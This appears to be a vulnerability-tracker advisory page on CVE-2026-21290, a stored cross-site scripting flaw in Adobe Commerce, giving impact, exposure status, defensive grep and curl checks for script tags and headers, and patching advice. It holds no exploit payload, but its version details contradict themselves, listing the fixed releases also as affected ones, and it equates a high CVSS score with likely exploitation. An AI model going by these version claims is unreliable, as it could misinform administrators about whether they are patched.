Plattform
adobe
Komponente
adobe-commerce
Behoben in
2.4.5-p15
2.4.6-p13
2.4.7-p8
2.4.8-p3
2.4.9-alpha3
CVE-2026-21290 describes a stored Cross-Site Scripting (XSS) vulnerability in Adobe Commerce. This vulnerability allows a low-privileged attacker to inject malicious scripts into vulnerable form fields, potentially leading to session takeover and compromising data integrity. The vulnerability affects versions 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, and 2.4.4-p16 and earlier. Adobe has released patches to address this issue.
Successful exploitation of CVE-2026-21290 allows an attacker to inject arbitrary JavaScript code into vulnerable form fields within Adobe Commerce. When a user interacts with the affected page – for example, by submitting a form or viewing content containing the injected script – the malicious code executes within their browser context. This can lead to a variety of attacks, including session hijacking, where the attacker gains control of the user's account. The attacker could also steal sensitive information, deface the website, or redirect users to malicious sites. The high confidentiality and integrity impact stems from the potential for complete account compromise and data manipulation.
CVE-2026-21290 was publicly disclosed on March 11, 2026. Currently, there are no known active campaigns exploiting this specific vulnerability. The availability of a public proof-of-concept is not yet confirmed. The vulnerability is not listed on the CISA KEV catalog at the time of writing. The CVSS score of 8.7 indicates a high probability of exploitation if the vulnerability is exposed and accessible.
Organizations utilizing Adobe Commerce versions 0–2.4.4-p16, particularly those with custom extensions or integrations that handle user input, are at significant risk. Shared hosting environments where multiple tenants share the same Adobe Commerce instance are also vulnerable, as an attacker compromising one tenant could potentially exploit this vulnerability to affect others.
• wordpress / composer / npm:
grep -r "<script>" /var/www/html/app/code/Magento/*• generic web:
curl -I https://your-magento-site.com/form-page | grep Content-Security-Policy• generic web:
Check access and error logs for suspicious POST requests containing <script> tags or other XSS payloads.
• generic web:
Inspect form field input and output for unexpected HTML or JavaScript code.
disclosure
Exploit-Status
EPSS
0.04% (13% Perzentil)
CISA SSVC
CVSS-Vektor
The primary mitigation for CVE-2026-21290 is to upgrade to a patched version of Adobe Commerce. Adobe has released updates to address this vulnerability. If immediate patching is not feasible, consider implementing input validation and output encoding on all user-supplied data to prevent script injection. Web Application Firewalls (WAFs) configured with rules to detect and block XSS payloads can also provide a layer of protection. Regularly review and update security configurations to minimize the attack surface.
Aktualisieren Sie Adobe Commerce auf die neueste verfügbare Version. Weitere Details und spezifische Update-Anweisungen finden Sie im Adobe Security Bulletin.
Schwachstellenanalysen und kritische Warnungen direkt in deinen Posteingang.
CVE-2026-21290 is a stored Cross-Site Scripting (XSS) vulnerability affecting Adobe Commerce versions 0–2.4.4-p16, allowing attackers to inject malicious scripts.
If you are running Adobe Commerce versions 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, or 2.4.4-p16 or earlier, you are potentially affected.
Upgrade to a patched version of Adobe Commerce as specified in the official Adobe Security Bulletin. Implement input validation and output encoding as a temporary workaround.
As of now, there are no confirmed reports of active exploitation, but it's crucial to apply the patch promptly.
Refer to the official Adobe Security Bulletin for detailed information and patching instructions: [https://www.adobe.com/security/advisories/](https://www.adobe.com/security/advisories/)
Lade deine Abhängigkeitsdatei hoch und erfahre sofort, ob dich diese und andere CVEs treffen.